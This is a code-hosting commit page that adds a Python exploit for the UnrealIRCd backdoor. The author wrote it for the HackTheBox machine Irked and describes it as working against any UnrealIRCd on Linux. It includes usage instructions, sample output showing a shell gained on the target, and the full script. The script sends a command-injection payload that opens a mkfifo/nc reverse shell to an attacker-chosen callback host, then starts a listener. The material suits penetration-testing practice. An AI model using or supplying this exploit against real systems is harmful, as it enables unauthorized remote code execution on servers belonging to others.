Commit 3f2fe8b8 authored by 0xdf's avatar 0xdf

added unrealirc exploit

parent daf7a2e8
## Description
I recently ran into the need to exploit an [UnrealIRCd server]( Version contains a backdoor which can provide RCE. There's already a [Metasploit exploit module]( for the vulnerability, but I didn't really love the scripts I found out there for it. So I wrote my own.
While I developed this script for [Irked from HackTheBox](, it should be generic to any UnrealIRCd deployment on Linux, provided that a mkfifo reverse shell works on the target.
## Usage
Call the python script with four arguments to identify the target ip and port, and the callback ip and port you want to use. Then, wait and get a shell:
root@kali# ./ 6697 443
[*] Connecting to
[*] Sending payload
[+] Payload sent. Closing socket.
[*] Opening listener. Callback should come within a minute
bash: cannot set terminal process group (634): Inappropriate ioctl for device
bash: no job control in this shell
ircd@irked:~/Unreal3.2$ id
uid=1001(ircd) gid=1001(ircd) groups=1001(ircd)
#!/usr/bin/env python3
import socket
import subprocess
import sys
if len(sys.argv) != 5:
print(f"Usage: {sys.argv[0]} [target_ip] [target_port] [callback ip] [callback port]")
rhost, rport, lhost, lport = sys.argv[1:]
print(f"[*] Connecting to {rhost}:{rport}")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((rhost, int(rport)))
print(f"[-] Failed to connect to {rhost}:{rport}")
print("[*] Sending payload")
s.send(f"AB; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc {lhost} {lport} >/tmp/f\n".encode())
print("[+] Payload sent. Closing socket.")
print("[*] Opening listener. Callback should come within a minute")
ncsh = subprocess.Popen(f"nc -nl {lhost} {lport}", shell=True)
print("\n[!] Exiting shell")
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment